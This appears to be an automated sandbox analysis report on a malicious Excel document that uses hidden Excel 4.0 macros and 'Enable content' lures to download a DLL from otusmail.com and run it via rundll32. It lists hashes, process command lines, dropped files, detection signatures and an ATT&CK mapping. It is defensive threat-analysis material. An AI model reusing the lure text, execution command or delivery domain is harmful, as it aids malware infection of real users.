Play interactive tour

Edit tour

Analysis Report Documents_111651917_375818984.xls

Overview

General Information

Sample Name:	Documents_111651917_375818984.xls
Analysis ID:	403285
MD5:	72526a505496a9b7da9a6c9651dbda5e
SHA1:	84cf963666314eee0d8ad1ef09e5462a66e3ccbf
SHA256:	3c20530c13d6736ec705786d1694052b2abf42bf87d3bbc359ea95b343fcf681
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Office process drops PE file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains embedded VBA macros

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2064 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

rundll32.exe (PID: 2564 cmdline: rundll32 ..\bsdnbsej.dbw,PluginInit MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2484 cmdline: rundll32 ..\bsdnbsej.dbw,PluginInit MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
Documents_111651917_375818984.xls	SUSP_EnableContent_String_Gen	Detects suspicious string that asks to enable active content in Office Doc	Florian Roth	0x165c5:$e1: Enable Editing 0x1630f:$e3: Enable editing 0x163e1:$e4: Enable content

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: unknown

HTTPS traffic detected: 172.67.151.10:443 -> 192.168.2.22:49165 version: TLS 1.2

Source:	Binary string: c:\Behind\964\Chance_lie\her l\money.pdb source: vegas[1].dll.0.dr
Source:	Binary string: c:\Behind\964\Chance_lie\her l\money.pdb@ source: vegas[1].dll.0.dr

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E725D36 FindFirstFileExW,

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vegas[1].dll

Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: vegas[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Source: global traffic

DNS query: name: otusmail.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.67.151.10:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.67.151.10:443

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\50757093.emf

Jump to behavior

Source: rundll32.exe, 00000003.00000002.2174078892.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173337440.0000000000960000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: otusmail.com

Source: rundll32.exe, 00000003.00000002.2174078892.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173337440.0000000000960000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2174078892.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173337440.0000000000960000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2174265271.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173529258.0000000000B47000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2174265271.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173529258.0000000000B47000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2174265271.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173529258.0000000000B47000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2174265271.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173529258.0000000000B47000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2174078892.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173337440.0000000000960000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2174265271.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173529258.0000000000B47000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2174078892.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173337440.0000000000960000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2173337440.0000000000960000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165

Source: unknown

HTTPS traffic detected: 172.67.151.10:443 -> 192.168.2.22:49165 version: TLS 1.2

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable editing Windowscan check onlinefora solution tothe problem. ernet. 13 14 Protected View Thi
Source: Screenshot number: 8	Screenshot OCR: Enable editing Windowscan check onlinefora solution tothe problem. ernet. 13 14 Protected View Thi
Source: Screenshot number: 12	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 0 Protected Vi
Source: Screenshot number: 12	Screenshot OCR: Enable content" to oerform Microsoft Office Decrvotion Core to start LI U 18 the decryption of the
Source: Document image extraction number: 2	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2	Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3	Screenshot OCR: Enable Content
Source: Document image extraction number: 4	Screenshot OCR: Enable Editing
Source: Document image extraction number: 13	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 13	Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: Documents_111651917_375818984.xls	Initial sample: EXEC
Source: Documents_111651917_375818984.xls	Initial sample: CALL

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: Documents_111651917_375818984.xls

Initial sample: Sheet size: 4672

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vegas[1].dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\bsdnbsej.dbw			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E72A4E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E71353B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E71F5B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E721580
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E777C26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E77B44E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E78798C

Source: Documents_111651917_375818984.xls

OLE indicator, VBA macros: true

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vegas[1].dll 0A87BD3BB60320B21E493341B70519AF4E46C2E969038D6D89B536CD37AA11D9
Source: Joe Sandbox View	Dropped File: C:\Users\user\bsdnbsej.dbw 0A87BD3BB60320B21E493341B70519AF4E46C2E969038D6D89B536CD37AA11D9

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 6E71ACF0 appears 34 times

Source: Documents_111651917_375818984.xls, type: SAMPLE

Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research

Source: rundll32.exe, 00000003.00000002.2174078892.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173337440.0000000000960000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal88.expl.evad.winXLS@5/8@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRBB52.tmp

Jump to behavior

Source: Documents_111651917_375818984.xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe rundll32 ..\bsdnbsej.dbw,PluginInit

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\bsdnbsej.dbw,PluginInit
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\bsdnbsej.dbw,PluginInit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\bsdnbsej.dbw,PluginInit
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\bsdnbsej.dbw,PluginInit

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: c:\Behind\964\Chance_lie\her l\money.pdb source: vegas[1].dll.0.dr
Source:	Binary string: c:\Behind\964\Chance_lie\her l\money.pdb@ source: vegas[1].dll.0.dr

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E72AC21 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E7796ED push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E73C6D1 push cs; retn 0000h
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E73EEC4 push es; iretd
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E73D7A9 push esi; iretd
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E73CAEC push ebx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E73E143 push ecx; iretd
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E79069F push dword ptr [edi]; iretd
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E791CCC push edx; iretd
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E792992 push edi; ret

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vegas[1].dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\bsdnbsej.dbw			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\bsdnbsej.dbw

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\bsdnbsej.dbw

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\bsdnbsej.dbw

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vegas[1].dll

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

API coverage: 6.5 %

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E725D36 FindFirstFileExW,

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E717C49 LdrInitializeThunk,

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E7237A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E722A8C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E725960 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E78FEC2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E78FDF8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E78F9FF push dword ptr fs:[00000030h]

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E717D3A GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E71A7E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E7237A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E71A9E4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Windows\System32\rundll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\bsdnbsej.dbw,PluginInit

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E71AB0A cpuid

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E71AD36 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting21	Path Interception	Process Injection11	Masquerading121	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution43	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Security Software Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	System Information Discovery23	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting21	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Documents_111651917_375818984.xls	3%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vegas[1].dll	4%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vegas[1].dll	4%	ReversingLabs
C:\Users\user\bsdnbsej.dbw	4%	Virustotal	Browse
C:\Users\user\bsdnbsej.dbw	4%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
cdn.digicertcdn.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
otusmail.com	172.67.151.10	true	false		unknown
cdn.digicertcdn.com	104.18.10.39	true	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000003.00000002.2174265271.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173529258.0000000000B47000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	rundll32.exe, 00000004.00000002.2173337440.0000000000960000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000003.00000002.2174078892.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173337440.0000000000960000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000003.00000002.2174078892.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173337440.0000000000960000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	rundll32.exe, 00000003.00000002.2174265271.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173529258.0000000000B47000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000003.00000002.2174265271.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173529258.0000000000B47000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000003.00000002.2174078892.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173337440.0000000000960000.00000002.00000001.sdmp	false		high
http://investor.msn.com/	rundll32.exe, 00000003.00000002.2174078892.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2173337440.0000000000960000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.151.10	otusmail.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	403285
Start date:	04.05.2021
Start time:	01:05:36
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 1s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Documents_111651917_375818984.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.expl.evad.winXLS@5/8@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 35.5% (good quality ratio 33%) Quality average: 75.9% Quality standard deviation: 31.4%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
